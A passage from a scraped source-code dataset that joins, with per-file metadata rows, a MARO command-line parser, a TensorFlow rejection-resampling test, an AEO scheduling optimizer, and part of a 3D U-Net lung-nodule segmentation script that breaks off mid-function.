parents=[global_parser]
)
parser_node_scale.add_argument("cluster_name", help="Name of the cluster")
parser_node_scale.add_argument("node_size", help="Azure VM size")
parser_node_scale.add_argument("replicas", type=int, help="Target number of the nodes in the specific node_size")
parser_node_scale.set_defaults(func=scale_node)
# maro k8s node list
from maro.cli.k8s.node import list_node
parser_node_scale = parser_node_subparsers.add_parser(
"list",
help="List details of nodes",
examples=CliExamples.MARO_K8S_NODE_LIST,
parents=[global_parser]
)
parser_node_scale.add_argument("cluster_name", help="Name of the cluster")
parser_node_scale.set_defaults(func=list_node)
# maro k8s image
parser_image = subparsers.add_parser(
"image",
help="Manage images of the cluster",
parents=[global_parser]
)
parser_image.set_defaults(func=_help_func(parser=parser_image))
parser_image_subparsers = parser_image.add_subparsers()
# maro k8s image push
from maro.cli.k8s.image import push_image
parser_image_push = parser_image_subparsers.add_parser(
"push",
help="Push a local image to the cluster",
examples=CliExamples.MARO_K8S_IMAGE_PUSH,
parents=[global_parser]
)
parser_image_push.add_argument("cluster_name", help="Name of the cluster")
parser_image_push.add_argument("--image-name", help="Name of the local image")
parser_image_push.set_defaults(func=push_image)
# maro k8s image list
from maro.cli.k8s.image import list_image
parser_image_push = parser_image_subparsers.add_parser(
"list",
help="List the images in the cluster",
examples=CliExamples.MARO_K8S_IMAGE_LIST,
parents=[global_parser]
)
parser_image_push.add_argument("cluster_name", help="Name of the cluster")
parser_image_push.set_defaults(func=list_image)
# maro k8s data
parser_data = subparsers.add_parser(
"data",
help="Manage user data storage in the cluster",
parents=[global_parser]
)
parser_data.set_defaults(func=_help_func(parser=parser_data))
parser_data_subparsers = parser_data.add_subparsers()
# maro k8s data push
from maro.cli.k8s.data import push_data
parser_data_push = parser_data_subparsers.add_parser(
"push",
help="Push the local data to the remote directory",
examples=CliExamples.MARO_K8S_DATA_PUSH,
parents=[global_parser]
)
parser_data_push.add_argument("cluster_name", help="Name of the cluster")
parser_data_push.add_argument("local_path", help="Path of the local file")
parser_data_push.add_argument("remote_dir", help="Path of the directory in the cluster data storage")
parser_data_push.set_defaults(func=push_data)
# maro k8s data pull
from maro.cli.k8s.data import pull_data
parser_data_pull = parser_data_subparsers.add_parser(
"pull",
help="Pull the remote data to the local directory",
examples=CliExamples.MARO_K8S_DATA_PULL,
parents=[global_parser]
)
parser_data_pull.add_argument("cluster_name", help="Name of the cluster")
parser_data_pull.add_argument("remote_path", help="Path of the file in the cluster data storage")
parser_data_pull.add_argument("local_dir", help="Path of the directory in the local")
parser_data_pull.set_defaults(func=pull_data)
# maro k8s data remove
from maro.cli.k8s.data import remove_data
parser_data_pull = parser_data_subparsers.add_parser(
"remove",
help="Remove data in the cluster data storage",
parents=[global_parser]
)
parser_data_pull.add_argument("cluster_name", help="Name of the cluster")
parser_data_pull.add_argument("remote_path", help="Path of the file in the cluster data storage")
parser_data_pull.set_defaults(func=remove_data)
# maro k8s job
parser_job = subparsers.add_parser(
"job",
help="Manage jobs",
parents=[global_parser]
)
parser_job.set_defaults(func=_help_func(parser=parser_job))
parser_job_subparsers = parser_job.add_subparsers()
# maro k8s job start
from maro.cli.k8s.job import start_job
parser_job_start = parser_job_subparsers.add_parser(
"start",
help="Start a training job",
examples=CliExamples.MARO_K8S_JOB_START,
parents=[global_parser]
)
parser_job_start.add_argument("cluster_name", help="Name of the cluster")
parser_job_start.add_argument("deployment_path", help="Path of the job deployment")
parser_job_start.set_defaults(func=start_job)
# maro k8s job stop
from maro.cli.k8s.job import stop_job
parser_job_stop = parser_job_subparsers.add_parser(
"stop",
help="Stop a training job",
examples=CliExamples.MARO_K8S_JOB_STOP,
parents=[global_parser]
)
parser_job_stop.add_argument("cluster_name", help="Name of the cluster")
parser_job_stop.add_argument("job_name", help="Name of the job")
parser_job_stop.set_defaults(func=stop_job)
# maro k8s job logs
from maro.cli.k8s.job import get_job_logs
parser_job_logs = parser_job_subparsers.add_parser(
"logs",
help="Get logs of the job",
parents=[global_parser]
)
parser_job_logs.add_argument("cluster_name", help="Name of the cluster")
parser_job_logs.add_argument("job_name", help="Name of the job")
parser_job_logs.set_defaults(func=get_job_logs)
# maro k8s job list
from maro.cli.k8s.job import list_job
parser_job_list = parser_job_subparsers.add_parser(
"list",
help="List details of jobs",
parents=[global_parser]
)
parser_job_list.add_argument("cluster_name", help="Name of the cluster")
parser_job_list.set_defaults(func=list_job)
# maro k8s schedule
parser_schedule = subparsers.add_parser(
"schedule",
help="Manage schedules",
parents=[global_parser]
)
parser_schedule.set_defaults(func=_help_func(parser=parser_schedule))
parser_schedule_subparsers = parser_schedule.add_subparsers()
# maro k8s schedule start
from maro.cli.k8s.schedule import start_schedule
parser_schedule_start = parser_schedule_subparsers.add_parser(
"start",
help="Start a schedule",
examples=CliExamples.MARO_K8S_SCHEDULE_START,
parents=[global_parser]
)
parser_schedule_start.add_argument("cluster_name", help="Name of the cluster")
parser_schedule_start.add_argument("deployment_path", help="Path of the schedule deployment")
parser_schedule_start.set_defaults(func=start_schedule)
# maro k8s schedule stop
from maro.cli.k8s.schedule import stop_schedule
parser_schedule_stop = parser_schedule_subparsers.add_parser(
"stop",
help="Stop a schedule",
examples=CliExamples.MARO_K8S_SCHEDULE_STOP,
parents=[global_parser]
)
parser_schedule_stop.add_argument("cluster_name", help="Name of the cluster")
parser_schedule_stop.add_argument("schedule_name", help="Name of the schedule")
parser_schedule_stop.set_defaults(func=stop_schedule)
# maro k8s status
from maro.cli.k8s.status import status
parser_status = subparsers.add_parser(
"status",
help="Get status of the cluster",
examples=CliExamples.MARO_K8S_STATUS,
parents=[global_parser]
)
parser_status.add_argument("cluster_name", help="Name of the cluster")
parser_status.set_defaults(func=status)
# maro k8s template
from maro.cli.k8s.template import template
parser_template = subparsers.add_parser(
"template",
help="Get deployment templates",
examples=CliExamples.MARO_K8S_TEMPLATE,
parents=[global_parser]
)
parser_template.add_argument("export_path", default="./", help="Path of the export directory")
parser_template.set_defaults(func=template)
def load_parser_data(prev_parser: ArgumentParser, global_parser: ArgumentParser):
data_cmd_sub_parsers = prev_parser.add_subparsers()
# BUILD
from maro.cli.data_pipeline.utils import convert
build_cmd_parser = data_cmd_sub_parsers.add_parser(
"build",
fromfile_prefix_chars="@",
help="Build csv file to a strong type tight binary file.",
parents=[global_parser])
build_cmd_parser.add_argument(
"--meta",
type=str,
required=True,
help="Metafile for binary file building.")
build_cmd_parser.add_argument(
"--file",
type=str,
required=True,
nargs="+",
help="""
        Path to the original csv file(s) used for the build.
        You can save your file names in a list file and pass it with the @ prefix to read the file list from it,
        e.g. 'maro data build --meta meta.yml --output o.bin --file @files.txt',
        or just convert a single file, e.g. 'maro data build --meta meta.yml --output o.bin --file input_file.csv'.
""")
build_cmd_parser.add_argument(
"--output",
type=str,
required=True,
help="Path (with file name) to dump the binary file.")
build_cmd_parser.add_argument(
"--start-timestamp",
dest="start_timestamp",
type=int,
default=None,
required=False,
help="""
        Specify the start timestamp (in UTC) for the binary file;
        this timestamp is treated as tick=0 by the binary reader,
        which can be used to align the reader pipeline.
""")
build_cmd_parser.set_defaults(func=convert)
def load_parser_meta(prev_parser: ArgumentParser, global_parser: ArgumentParser):
meta_cmd_sub_parsers = prev_parser.add_subparsers()
# Deploy
from maro.cli.data_pipeline.data_process import meta_deploy
deploy_cmd_parser = meta_cmd_sub_parsers.add_parser(
"deploy",
help="Deploy data files for MARO.",
parents=[global_parser])
deploy_cmd_parser.set_defaults(func=meta_deploy)
def load_parser_inspector(prev_parser: ArgumentParser, global_parser: ArgumentParser):
inspector_cmd_sub_parsers = prev_parser.add_subparsers()
from maro.cli.inspector.env_data_process import start_vis
dashboard_cmd_parser = inspector_cmd_sub_parsers.add_parser(
"dashboard",
fromfile_prefix_chars="@",
help="Dashboard of selected env displayed.",
parents=[global_parser]
)
dashboard_cmd_parser.add_argument(
"--source_path",
type=str,
required=True,
help="Folder path to load data, should be root path of snapshot folders. e.g. ~/project_root/dump_files/"
)
dashboard_cmd_parser.add_argument(
"--force",
type=str,
required=False,
default="True",
help="Overwrite the generated summary data or not: True/False."
)
dashboard_cmd_parser.set_defaults(func=start_vis)
from maro.cli.maro_real_time_vis.start_maro_geo_vis import start_geo_vis
geo_cmd_parser = inspector_cmd_sub_parsers.add_parser(
"geo",
fromfile_prefix_chars="@",
help="Geographic data display.",
parents=[global_parser]
)
geo_cmd_parser.add_argument(
"--start",
type=str,
help="Kind of container expected to start, Database or Service.",
required=True
)
geo_cmd_parser.add_argument(
"--experiment_name",
type=str,
required=False,
help="Name of experiment expected to be displayed."
)
geo_cmd_parser.add_argument(
"--front_end_port",
type=int,
required=False,
help="Specified port of front_end."
)
geo_cmd_parser.set_defaults(func=start_geo_vis)
def load_parser_project(prev_parser: ArgumentParser, global_parser: ArgumentParser):
sub_parsers = prev_parser.add_subparsers()
from maro.cli.project_generator.project_generator import new_project
# maro project new
new_cmd_parser = sub_parsers.add_parser(
"new",
help="Generate a new project under current directory to work with MARO.",
parents=[global_parser]
)
    # This command does not accept arguments in the usual way; it walks the user through a simple wizard instead.
new_cmd_parser.set_defaults(func=new_project)
def load_parser_admin(prev_parser: ArgumentParser, global_parser: ArgumentParser):
sub_parsers = prev_parser.add_subparsers()
# Start
from maro.cli.utils.node_admin import start_admin
start_parser = sub_parsers.add_parser(
"start",
help="Start MARO admin web server.",
parents=[global_parser])
start_parser.set_defaults(func=start_admin)
# Stop
from maro.cli.utils.node_admin import stop_admin
stop_parser = sub_parsers.add_parser(
"stop",
help="Stop MARO admin web server.",
parents=[global_parser])
stop_parser.set_defaults(func=stop_admin)
# Requirements
from maro.cli.utils.node_admin import requirements_admin
req_parser = sub_parsers.add_parser(
"req",
help="Install requirements for MARO admin web server.",
parents=[global_parser])
req_parser.set_defaults(func=requirements_admin)
def _help_func(parser):
def wrapper(*args, **kwargs):
parser.print_help()
return wrapper
def _get_actual_args(namespace: Namespace) -> dict:
actual_args = vars(deepcopy(namespace))
return actual_args
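def _dispatch_pattern_demo():
    """Illustrative sketch only (not part of MARO): shows, on a plain argparse
    parser, the `set_defaults(func=...)` dispatch pattern every subcommand in
    this module relies on. The names `toy_parser` and `greet` are made up."""
    import argparse
    def greet(name, **kwargs):
        print(f"hello {name}")
    toy_parser = argparse.ArgumentParser(prog="toy")
    sub = toy_parser.add_subparsers()
    greet_parser = sub.add_parser("greet")
    greet_parser.add_argument("name")
    greet_parser.set_defaults(func=greet)
    ns = toy_parser.parse_args(["greet", "maro"])
    # As in main(), the whole namespace (including 'func' itself) is passed on
    # as keyword arguments, so handlers take **kwargs to absorb the extras.
    ns.func(**vars(ns))  # prints "hello maro"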
if __name__ == '__main__':
main()
| 35.267389
| 117
| 0.698983
|
063e12309080ed2776f217a532fde48b49a1c930
| 5,154
|
py
|
Python
|
tensorflow/python/data/experimental/kernel_tests/rejection_resample_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 36
|
2016-12-17T15:25:25.000Z
|
2022-01-29T21:50:53.000Z
|
tensorflow/python/data/experimental/kernel_tests/rejection_resample_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 59
|
2019-06-17T09:37:49.000Z
|
2022-01-19T01:21:34.000Z
|
tensorflow/python/data/experimental/kernel_tests/rejection_resample_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 36
|
2017-07-27T21:12:40.000Z
|
2022-02-03T16:45:56.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.experimental.rejection_resample()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python.data.experimental.ops import resampling
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import test_util
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
from tensorflow.python.util import compat
@test_util.run_all_in_graph_and_eager_modes
class RejectionResampleTest(test_base.DatasetTestBase, parameterized.TestCase):
@parameterized.named_parameters(
("InitialDistributionKnown", True),
("InitialDistributionUnknown", False))
def testDistribution(self, initial_known):
classes = np.random.randint(5, size=(20000,)) # Uniformly sampled
target_dist = [0.9, 0.05, 0.05, 0.0, 0.0]
initial_dist = [0.2] * 5 if initial_known else None
classes = math_ops.cast(classes, dtypes.int64) # needed for Windows build.
dataset = dataset_ops.Dataset.from_tensor_slices(classes).shuffle(
200, seed=21).map(lambda c: (c, string_ops.as_string(c))).repeat()
get_next = self.getNext(
dataset.apply(
resampling.rejection_resample(
target_dist=target_dist,
initial_dist=initial_dist,
class_func=lambda c, _: c,
seed=27)))
returned = []
while len(returned) < 4000:
returned.append(self.evaluate(get_next()))
returned_classes, returned_classes_and_data = zip(*returned)
_, returned_data = zip(*returned_classes_and_data)
self.assertAllEqual([compat.as_bytes(str(c))
for c in returned_classes], returned_data)
total_returned = len(returned_classes)
class_counts = np.array([
len([True for v in returned_classes if v == c])
for c in range(5)])
returned_dist = class_counts / total_returned
self.assertAllClose(target_dist, returned_dist, atol=1e-2)
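  # Worked example of the distributions used above (illustrative numbers, not
  # a claim about the exact internals of resampling.rejection_resample): with
  # initial_dist = [0.2] * 5 and target_dist = [0.9, 0.05, 0.05, 0.0, 0.0] the
  # per-class ratios target/initial are [4.5, 0.25, 0.25, 0.0, 0.0]. A standard
  # rejection scheme accepts class c with probability ratio_c / max(ratio),
  # i.e. roughly [1.0, 0.056, 0.056, 0.0, 0.0], which is why the returned
  # stream is dominated by class 0 and is checked against target_dist here.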
@parameterized.named_parameters(
("OnlyInitial", True),
("NotInitial", False))
def testEdgeCasesSampleFromInitialDataset(self, only_initial_dist):
init_dist = [0.5, 0.5]
target_dist = [0.5, 0.5] if only_initial_dist else [0.0, 1.0]
num_classes = len(init_dist)
# We don't need many samples to test that this works.
num_samples = 100
data_np = np.random.choice(num_classes, num_samples, p=init_dist)
dataset = dataset_ops.Dataset.from_tensor_slices(data_np)
# Reshape distribution.
dataset = dataset.apply(
resampling.rejection_resample(
class_func=lambda x: x,
target_dist=target_dist,
initial_dist=init_dist))
get_next = self.getNext(dataset)
returned = []
with self.assertRaises(errors.OutOfRangeError):
while True:
returned.append(self.evaluate(get_next()))
def testRandomClasses(self):
init_dist = [0.25, 0.25, 0.25, 0.25]
target_dist = [0.0, 0.0, 0.0, 1.0]
num_classes = len(init_dist)
# We don't need many samples to test a dirac-delta target distribution.
num_samples = 100
data_np = np.random.choice(num_classes, num_samples, p=init_dist)
dataset = dataset_ops.Dataset.from_tensor_slices(data_np)
# Apply a random mapping that preserves the data distribution.
def _remap_fn(_):
return math_ops.cast(random_ops.random_uniform([1]) * num_classes,
dtypes.int32)[0]
dataset = dataset.map(_remap_fn)
# Reshape distribution.
dataset = dataset.apply(
resampling.rejection_resample(
class_func=lambda x: x,
target_dist=target_dist,
initial_dist=init_dist))
get_next = self.getNext(dataset)
returned = []
with self.assertRaises(errors.OutOfRangeError):
while True:
returned.append(self.evaluate(get_next()))
classes, _ = zip(*returned)
bincount = np.bincount(
np.array(classes),
minlength=num_classes).astype(np.float32) / len(classes)
self.assertAllClose(target_dist, bincount, atol=1e-2)
if __name__ == "__main__":
test.main()
| 36.553191
| 80
| 0.697711
|
9be2d4efd921d8909122c6e3ac2881c38ebeed12
| 4,354
|
py
|
Python
|
optimizer/AEO.py
|
thieu1995/IFCB
|
4a5936f93e4e317915dfcd12682829cf20a39552
|
[
"MIT"
] | 4
|
2021-02-05T13:45:23.000Z
|
2022-03-09T05:44:58.000Z
|
optimizer/AEO.py
|
bkc-group/IFCB
|
1ada1151eb057510c16b0ed66b980b736603a0e5
|
[
"MIT"
] | null | null | null |
optimizer/AEO.py
|
bkc-group/IFCB
|
1ada1151eb057510c16b0ed66b980b736603a0e5
|
[
"MIT"
] | 2
|
2021-02-15T14:55:22.000Z
|
2021-03-13T08:48:17.000Z
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu" at 12:27, 15/01/2021 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Nguyen_Thieu2 %
# Github: https://github.com/thieu1995 %
# ------------------------------------------------------------------------------------------------------%
from copy import deepcopy
from config import Config
from optimizer.root import Root
from numpy.random import uniform, randint, normal
from utils.schedule_util import matrix_to_schedule
class BaseAEO(Root):
def __init__(self, problem=None, pop_size=10, epoch=2, func_eval=100000, lb=None, ub=None, verbose=True, paras=None):
super().__init__(problem, pop_size, epoch, func_eval, lb, ub, verbose)
def evolve(self, pop=None, fe_mode=None, epoch=None, g_best=None):
# Sorted population in the descending order of the function fitness value
if Config.METRICS in Config.METRICS_MAX:
pop = sorted(pop, key=lambda item: item[self.ID_FIT])
else:
pop = sorted(pop, key=lambda item: item[self.ID_FIT], reverse=True)
pop_new = deepcopy(pop)
## Production - Update the worst solution
# Eq. 2, 3, 1
a = (1.0 - epoch / self.epoch) * uniform()
while True:
child = (1 - a) * pop[-1][self.ID_POS] + a * uniform(self.lb, self.ub, pop[-1][self.ID_POS].shape)
schedule = matrix_to_schedule(self.problem, child)
if schedule.is_valid():
fit = self.Fit.fitness(schedule)
break
pop_new[0] = [child, fit]
## Consumption
for i in range(2, self.pop_size):
while True:
rand = uniform()
# Eq. 4, 5, 6
v1 = normal(0, 1)
v2 = normal(0, 1)
c = 0.5 * v1 / abs(v2) # Consumption factor
j = randint(1, i)
### Herbivore
if rand < 1.0 / 3:
child = pop[i][self.ID_POS] + c * (pop[i][self.ID_POS] - pop[0][self.ID_POS]) # Eq. 6
### Carnivore
                elif 1.0 / 3 <= rand <= 2.0 / 3:
child = pop[i][self.ID_POS] + c * (pop[i][self.ID_POS] - pop[j][self.ID_POS]) # Eq. 7
### Omnivore
else:
r2 = uniform()
child = pop[i][self.ID_POS] + c * (r2 * (pop[i][self.ID_POS] - pop[0][self.ID_POS]) + (1 - r2) * (pop[i][self.ID_POS] - pop[j][self.ID_POS]))
child = self.amend_position_random(child)
schedule = matrix_to_schedule(self.problem, child)
if schedule.is_valid():
fit = self.Fit.fitness(schedule)
break
pop_new[i] = [child, fit]
## Update old population
pop = self.update_old_population(pop, pop_new)
## find current best used in decomposition
current_best = self.get_current_best(pop)
## Decomposition
### Eq. 10, 11, 12, 9
for i in range(0, self.pop_size):
while True:
r3 = uniform()
d = 3 * normal(0, 1)
e = r3 * randint(1, 3) - 1
h = 2 * r3 - 1
child = current_best[self.ID_POS] + d * (e * current_best[self.ID_POS] - h * pop[i][self.ID_POS])
child = self.amend_position_random(child)
schedule = matrix_to_schedule(self.problem, child)
if schedule.is_valid():
fit = self.Fit.fitness(schedule)
break
pop_new[i] = [child, fit]
## Update old population
pop = self.update_old_population(pop, pop_new)
if fe_mode is None:
return pop
else:
            counter = 2 * self.pop_size  # two fitness-evaluation passes per epoch (consumption + decomposition)
return pop, counter
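    # Reading guide (added comments only; the equation numbers above presumably
    # refer to the original AEO paper): evolve() runs three phases.
    #   Production:    the solution tagged as worst is pulled toward a random
    #                  point, child = (1 - a) * x_worst + a * U(lb, ub), with
    #                  a = (1 - epoch / max_epoch) * U(0, 1) shrinking over time.
    #   Consumption:   every other solution moves relative to the producer
    #                  (herbivore), a random earlier solution (carnivore), or a
    #                  mix of both (omnivore), scaled by c = 0.5 * N(0,1) / |N(0,1)|.
    #   Decomposition: the population is regenerated around the current best
    #                  using the random coefficients d, e and h.
    # Each phase keeps only children that map to a valid schedule via
    # matrix_to_schedule(), which is why the while-True retry loops exist.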
| 46.319149
| 161
| 0.469453
|
48e3bc3121eaed2a85e0fe947aae515ff3c24c25
| 17,528
|
py
|
Python
|
code/Andre/py/refit_unet_d8g_222_swrap_03.py
|
astoc/kaggle_dsb2017
|
2421442cb220518d9ad70b0f3f7611ccf6303af4
|
[
"MIT"
] | 9
|
2017-08-08T16:38:54.000Z
|
2019-07-20T07:50:16.000Z
|
code/Andre/py/refit_unet_d8g_222_swrap_03.py
|
astoc/kaggle_dsb2017
|
2421442cb220518d9ad70b0f3f7611ccf6303af4
|
[
"MIT"
] | 1
|
2018-06-09T15:45:13.000Z
|
2018-06-09T15:45:13.000Z
|
code/Andre/py/refit_unet_d8g_222_swrap_03.py
|
astoc/kaggle_dsb2017
|
2421442cb220518d9ad70b0f3f7611ccf6303af4
|
[
"MIT"
] | 9
|
2017-07-18T11:42:25.000Z
|
2019-11-20T23:32:38.000Z
|
"""
Created on Thu Jan 26 17:04:11 2017
@author: Andre Stochniol, andre@stochniol.com
Fit unet style nodule identifier on Luna databaset using 8-grid scheme
Physical resolution 2x2x2mm
Data aggregated, shuffled; wrap augmentation used (swrap)
"""
import numpy as np
from keras.models import load_model,Model
from keras.layers import MaxPooling3D
from keras.layers import Convolution3D
from keras.layers import Input, merge, UpSampling3D
from keras.optimizers import Adam
from keras import backend as K
#from keras.preprocessing.image import ImageDataGenerator # Keras original
from image_as_mod3d_2dmask import ImageDataGenerator # our modified version
K.set_image_dim_ordering('th')
smooth = 1.
def dice_coef(y_true, y_pred):
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
DICE_LOW_LIMIT = 0 ## was 0.001
def dice_coef_np(y_true, y_pred):
y_true_f = y_true.flatten()
y_pred_f = y_pred.flatten()
y_pred_f [y_pred_f < DICE_LOW_LIMIT] = 0.
y_pred_f [y_pred_f > 1- DICE_LOW_LIMIT] = 1.
intersection = np.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)
def dice_coef_pos_np(y_true, y_pred, pos = 0):
y_true_f = y_true[:,pos].flatten()
y_pred_f = y_pred[:,pos].flatten()
intersection = np.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)
def dice_coef_loss(y_true, y_pred):
return -dice_coef(y_true, y_pred)
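# All of the dice helpers above compute the same smoothed Dice score,
#   dice = (2 * sum(y_true * y_pred) + smooth) / (sum(y_true) + sum(y_pred) + smooth),
# once on Keras tensors (dice_coef) and twice on numpy arrays; dice_coef_loss is
# simply its negative, so that maximising overlap minimises the loss.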
def unet_model_xd3_2_6l_grid(nb_filter=48, dim=5, clen=3 , img_rows=224, img_cols=224 ): # NOTE that this procedure is/should be used with img_rows & img_cols as None
# aiming for architecture similar to the http://cs231n.stanford.edu/reports2016/317_Report.pdf
    # Our model is six layers deep, consisting of a series of three CONV-RELU-POOL layers (with 32, 32, and 64 3x3 filters), a CONV-RELU layer (with 128 3x3 filters), three UPSCALE-CONV-RELU layers (with 64, 32, and 32 3x3 filters), and a final 1x1 CONV-SIGMOID layer to output pixel-level predictions. Its structure resembles Figure 2, though with the number of pixels, filters, and levels as described here
## 3D CNN version of a previously developed unet_model_xd_6j
zconv = clen
inputs = Input((1, dim, img_rows, img_cols))
conv1 = Convolution3D(nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(inputs)
conv1 = Convolution3D(nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv1)
pool1 = MaxPooling3D(pool_size=(2, 2, 2))(conv1)
conv2 = Convolution3D(2*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(pool1)
conv2 = Convolution3D(2*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv2)
pool2 = MaxPooling3D(pool_size=(2, 2, 2))(conv2)
conv4 = Convolution3D(4*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(pool2)
conv4 = Convolution3D(4*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv4)
up6 = merge([UpSampling3D(size=(2, 2, 2))(conv4), conv2], mode='concat', concat_axis=1)
conv6 = Convolution3D(2*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(up6)
conv6 = Convolution3D(2*nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv6)
up7 = merge([UpSampling3D(size=(2, 2, 2))(conv6), conv1], mode='concat', concat_axis=1) # original - only works for even dim
conv7 = Convolution3D(nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(up7)
conv7 = Convolution3D(nb_filter, zconv, clen, clen, activation='relu', border_mode='same')(conv7)
pool11 = MaxPooling3D(pool_size=(2, 1, 1))(conv7)
conv12 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(pool11)
conv12 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(conv12)
pool12 = MaxPooling3D(pool_size=(2, 1, 1))(conv12)
conv13 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(pool12)
conv13 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(conv13)
pool13 = MaxPooling3D(pool_size=(2, 1, 1))(conv13)
if (dim < 16):
conv8 = Convolution3D(1, 1, 1, 1, activation='sigmoid')(pool13)
else: # need one extra layer to get to 1D x 2D mask ...
conv14 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(pool13)
conv14 = Convolution3D(2*nb_filter, zconv, 1, 1, activation='relu', border_mode='same')(conv14)
pool14 = MaxPooling3D(pool_size=(2, 1, 1))(conv14)
conv8 = Convolution3D(1, 1, 1, 1, activation='sigmoid')(pool14)
model = Model(input=inputs, output=conv8)
model.compile(optimizer=Adam(lr=1e-4), loss=dice_coef_loss, metrics=[dice_coef])
#model.compile(optimizer=Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0), loss=dice_coef_loss, metrics=[dice_coef])
return model
def grid_data(source, grid=32, crop=16, expand=12):
height = source.shape[3] # should be 224 for our data, when used in the initial fix-size mode
width = source.shape[4]
gridheight = (height - 2 * crop) // grid # should be 6 for our data
gridwidth = (width - 2 * crop) // grid
cells = []
for j in range(gridheight):
for i in range (gridwidth):
cell = source[:,:,:, crop+j*grid-expand:crop+(j+1)*grid+expand, crop+i*grid-expand:crop+(i+1)*grid+expand]
cells.append(cell)
cells = np.vstack (cells)
return cells, gridwidth, gridheight
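# Worked example for the defaults above (illustrative, assuming the 224x224 slices
# mentioned in the comments): gridheight = gridwidth = (224 - 2*16) // 32 = 6, i.e.
# 36 cells per volume, each spanning grid + 2*expand = 32 + 24 = 56 pixels per side,
# so grid_data multiplies the batch dimension by 36 and yields 56x56 spatial patches.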
def data_from_grid (cells, gridwidth, gridheight, grid=32):
width = cells.shape[4]
crop = (width - grid ) // 2 ## for simplicity we are assuming the same crop (and grid) in x & y directions
if crop > 0: # do NOT crop with 0 as we get empty cells ...
cells = cells[:,:,:,crop:-crop,crop:-crop]
shape = cells.shape
new_shape_1_dim = shape[0]// (gridwidth * gridheight) # ws // 36 -- Improved on 20170306
new_shape = (gridwidth * gridheight, new_shape_1_dim, ) + tuple([x for x in shape][1:]) # was 36, Improved on 20170306
cells = np.reshape(cells, new_shape)
cells = np.moveaxis(cells, 0, -3)
shape = cells.shape
new_shape2 = tuple([x for x in shape[0:3]]) + (gridheight, gridwidth,) + tuple([x for x in shape[4:]])
cells = np.reshape(cells, new_shape2)
cells = cells.swapaxes(-2, -3)
shape = cells.shape
combine_shape =tuple([x for x in shape[0:3]]) + (shape[-4]*shape[-3], shape[-2]*shape[-1],)
cells = np.reshape(cells, combine_shape)
return cells
def data_from_grid_by_proximity (cells, gridwidth, gridheight, grid=32):
    # disperse the sequential data into layers and then use data_from_grid
shape = cells.shape
new_shape_1_dim = shape[0]// (gridwidth * gridheight) # ws // 36 -- Improved on 20170306
### NOTE tha we invert the order of shapes below to get the required proximity type ordering
new_shape = (new_shape_1_dim, gridwidth * gridheight, ) + tuple([x for x in shape][1:]) # was 36, Improved on 20170306
#new_shape = (gridwidth * gridheight, new_shape_1_dim, ) + tuple([x for x in shape][1:]) # was 36, Improved on 20170306
# swap ordering of axes
cells = np.reshape(cells, new_shape)
cells = cells.swapaxes(0, 1)
cells = np.reshape(cells, shape)
cells = data_from_grid (cells, gridwidth, gridheight, grid)
return cells
def load_aggregate_masks_scans (masks_mnames, grids, upgrid_multis):
scans = []
masks = []
igrid = 0
for masks_names in masks_mnames:
if (len(masks_names) > 0):
grid = grids[igrid]
upgrid_multi = upgrid_multis[igrid]
upgcount = upgrid_multi * upgrid_multi
scans1 = []
masks1 = []
for masks_name in masks_names:
print ("Loading: ", masks_name)
masks0 = np.load(''.join((masks_name, ".npz")))['arr_0']
scans0 = np.load(''.join((masks_name.replace("masks_", "scans_", 1), ".npz")))['arr_0']
masks1.append(masks0)
scans1.append(scans0)
scans1 = np.vstack(scans1)
masks1 = np.vstack(masks1)
if len(masks) > 0:
scans1 = np.vstack([scans1, scans])
masks1 = np.vstack([masks1, masks])
lm = len(masks1) // upgcount * upgcount
scans1 = scans1[0:lm] # cut to multiples of upgcount
masks1 = masks1[0:lm]
index_shuf = np.arange(lm)
np.random.shuffle(index_shuf)
scans1 = scans1[index_shuf]
masks1 = masks1[index_shuf]
scans = data_from_grid_by_proximity(scans1, upgrid_multi, upgrid_multi, grid=grid)
